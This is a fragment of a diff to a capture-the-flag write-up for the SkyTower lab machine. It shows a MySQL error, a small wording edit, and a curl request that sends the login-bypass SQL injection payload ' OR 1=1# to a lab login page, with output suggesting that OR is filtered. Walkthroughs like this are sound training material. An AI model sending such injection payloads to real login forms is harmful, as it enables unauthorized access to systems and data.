740i/Writeups/skytower/skytower.md

 ```
 There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1]
 ```
-So we try doing the usual ' OR 1=1# and we get nothing.
+So we try doing the usual ' OR 1=1# and get nothing.
 Checking the error message again it seems like OR is being filtered out.
 ```
 curl --data "email=admin&password=' OR 1=1#" http://192.168.56.101/login.php
 There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '11#'' at line 1]